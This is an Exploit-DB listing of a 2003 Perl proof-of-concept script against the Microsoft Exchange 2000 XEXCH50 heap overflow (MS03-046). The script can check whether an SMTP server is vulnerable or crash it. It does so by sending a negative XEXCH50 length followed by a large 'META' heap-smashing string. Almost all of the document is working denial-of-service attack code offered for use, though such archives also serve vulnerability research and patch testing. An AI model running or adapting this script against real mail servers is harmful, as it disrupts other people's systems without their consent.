Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)

EDB-ID:

113

CVE:

2003-0714

EDB Verified:

Author:

H D Moore

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2003-10-22

Vulnerable App: 
#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm metasploit com
# This vulnerability allows a remote unauthenticated user to overwrite big chunks 
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is 
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be 
# just about any size, the actual code that crashes varies widely with each request. 
# During the analysis process, numerous combinations of request size, concurrent 
# requests, pre-allocations, and alternate trigger routes were examined and not a 
# single duplicate of location and data offset was discovered. Hopefully the magic 
# combination of data, size, and setup will be found to allow this bug to be reliably 
# exploited.

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;


if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }

usage();


sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;    
    close ($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";

    exit(0);
}


sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;    

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] Sending massive heap-smashing string...\n";
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);

    exit(0);
}


sub usage 
{
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);

}

sub SMTP
{
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp"
    ) || return(undef);

    my $r = <$s>;
    return undef if !$r;
    
    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return(undef);
    }
    
    print $s "HELO X\r\n";
    $r = <$s>;
    return undef if !$r;   

    print $s "MAIL FROM: DoS\r\n";
    $r = <$s>;
    return undef if !$r;
    
    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>;
    return undef if !$r;
    
    return($s); 
}


# milw0rm.com [2003-10-22]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services